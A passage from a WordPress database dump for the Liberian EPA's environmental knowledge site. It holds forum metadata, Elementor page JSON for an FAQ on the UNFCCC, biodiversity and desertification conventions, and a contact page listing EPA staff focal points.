12:25:45'),(10985,1683,'_bbp_reply_count','0'),(10986,1683,'_bbp_reply_count_hidden','0'),(10987,1683,'_bbp_voice_count','1'),(10988,1808,'_elementor_controls_usage','a:0:{}'),(10989,1808,'_elementor_controls_usage','a:0:{}'),(10990,1808,'_bbp_forum_id','1179'),(10991,1808,'_bbp_topic_id','1685'),(10992,1808,'_bbp_author_ip','41.191.105.225'),(10993,1808,'_bbp_last_reply_id','0'),(10994,1808,'_bbp_last_active_id','1685'),(10995,1808,'_bbp_last_active_time','2019-11-05 12:31:42'),(10996,1808,'_bbp_reply_count','0'),(10997,1808,'_bbp_reply_count_hidden','0'),(10998,1808,'_bbp_voice_count','1'),(10999,1809,'_elementor_controls_usage','a:0:{}'),(11000,1809,'_elementor_controls_usage','a:0:{}'),(11001,1809,'_bbp_forum_id','1179'),(11002,1809,'_bbp_topic_id','1686'),(11003,1809,'_bbp_author_ip','41.191.105.225'),(11004,1809,'_bbp_last_reply_id','0'),(11005,1809,'_bbp_last_active_id','1686'),(11006,1809,'_bbp_last_active_time','2019-11-05 12:34:09'),(11007,1809,'_bbp_reply_count','0'),(11008,1809,'_bbp_reply_count_hidden','0'),(11009,1809,'_bbp_voice_count','1'),(11010,1810,'_elementor_controls_usage','a:0:{}'),(11011,1810,'_elementor_controls_usage','a:0:{}'),(11012,1810,'_bbp_forum_id','1179'),(11013,1810,'_bbp_topic_id','1687'),(11014,1810,'_bbp_author_ip','41.191.105.225'),(11015,1810,'_bbp_last_reply_id','0'),(11016,1810,'_bbp_last_active_id','1687'),(11017,1810,'_bbp_last_active_time','2019-11-05 12:35:32'),(11018,1810,'_bbp_reply_count','0'),(11019,1810,'_bbp_reply_count_hidden','0'),(11020,1810,'_bbp_voice_count','1'),(11047,1813,'_elementor_controls_usage','a:0:{}'),(11048,1813,'_elementor_controls_usage','a:0:{}'),(11049,1813,'_bbp_forum_id','1179'),(11050,1813,'_bbp_topic_id','1689'),(11051,1813,'_bbp_author_ip','41.191.105.225'),(11052,1813,'_bbp_last_reply_id','0'),(11053,1813,'_bbp_last_active_id','1689'),(11054,1813,'_bbp_last_active_time','2019-11-05 12:43:15'),(11055,1813,'_bbp_reply_count','0'),(11056,1813,'_bbp_reply_count_hidden','0'),(11057,1813,'_bbp_voice_count','1'),(11058,1814,'_elementor_controls_usage','a:0:{}'),(11059,1814,'_elementor_controls_usage','a:0:{}'),(11060,1814,'_bbp_forum_id','1179'),(11061,1814,'_bbp_topic_id','1690'),(11062,1814,'_bbp_author_ip','41.191.105.225'),(11063,1814,'_bbp_last_reply_id','0'),(11064,1814,'_bbp_last_active_id','1690'),(11065,1814,'_bbp_last_active_time','2019-11-05 12:46:25'),(11066,1814,'_bbp_reply_count','0'),(11067,1814,'_bbp_reply_count_hidden','0'),(11068,1814,'_bbp_voice_count','1'),(11069,1815,'_elementor_controls_usage','a:0:{}'),(11070,1815,'_elementor_controls_usage','a:0:{}'),(11071,1815,'_bbp_forum_id','1179'),(11072,1815,'_bbp_topic_id','1692'),(11073,1815,'_bbp_author_ip','41.191.105.225'),(11074,1815,'_bbp_last_reply_id','0'),(11075,1815,'_bbp_last_active_id','1692'),(11076,1815,'_bbp_last_active_time','2019-11-05 12:49:16'),(11077,1815,'_bbp_reply_count','0'),(11078,1815,'_bbp_reply_count_hidden','0'),(11079,1815,'_bbp_voice_count','1'),(11179,335,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(11180,335,'_wp_page_template','default'),(11181,335,'slide_template','default'),(11182,335,'_easy_image_gallery_link_images','off'),(11183,335,'_wpb_vc_js_status','false'),(11184,335,'wpex_overlay_header_style','white'),(11185,335,'wpex_overlay_header_dropdown_style','black'),(11186,335,'_elementor_edit_mode','builder'),(11187,335,'_elementor_template_type','wp-page'),(11188,335,'_elementor_version','2.7.5'),(11189,335,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implemented in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discuss on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.<\\/p>\",\"_id\":\"bc9c821\"},{\"tab_title\":\"How can i find knowledge resources on the EKMS?\",\"tab_content\":\"<p>Use the smart search feature on the homepage to search for keywords or better still select a category.<\\/p>\",\"_id\":\"39dd408\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(11212,80,'osh_disable_topbar_sticky','default'),(11213,80,'osh_disable_header_sticky','default'),(11214,80,'osh_sticky_header_style','default'),(11216,80,'_elementor_edit_mode','builder'),(11217,80,'_elementor_template_type','wp-page'),(11218,80,'_elementor_version','3.6.6'),(11220,80,'_wp_page_template','default'),(11221,80,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a 